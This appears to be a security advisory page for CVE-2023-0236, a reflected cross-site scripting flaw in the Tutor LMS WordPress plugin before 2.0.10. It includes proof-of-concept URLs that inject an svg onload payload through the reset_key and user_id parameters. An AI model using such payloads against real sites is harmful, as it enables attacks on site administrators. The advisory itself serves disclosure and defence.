Lucene search
So SakaguchiWPVDB-ID:503835DB-426D-4B49-85F7-C9A20D6FF5B8HistoryJan 12, 2023 - 12:00 a.m.
Tutor LMS < 2.0.10 - Reflected Cross-Site Scripting
2023-01-1200:00:00
So Sakaguchi
wpscan.com
11
tutor lms
cross-site scripting
plugin
vulnerability
xss
admin
0.001 Low
EPSS
Percentile
46.5%
The plugin does not sanitise and escape the reset_key and user_id parameters before outputting then back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin
PoC
https://example.com/dashboard/retrieve-password/?reset_key="><svg onload=prompt(/XSS/)>&user;_id=dd https://example.com/dashboard/retrieve-password/?reset_key=a&user;_id="><svg onload=prompt(/XSS/)>
Related
cvelist
cvelist
CVE-2023-0236 Tutor LMS < 2.0.10 - Reflected Cross-Site Scripting
2023-02-06 19:59:21
cve
cve
CVE-2023-0236
2023-02-06 20:15:14
nuclei
nuclei
WordPress Tutor LMS <2.0.10 - Cross Site Scripting
2023-03-18 22:07:09
wpexploit
wpexploit
Tutor LMS < 2.0.10 - Reflected Cross-Site Scripting
2023-01-12 00:00:00
nvd
nvd
CVE-2023-0236
2023-02-06 20:15:14
prion
prion
Cross site scripting
2023-02-06 20:15:00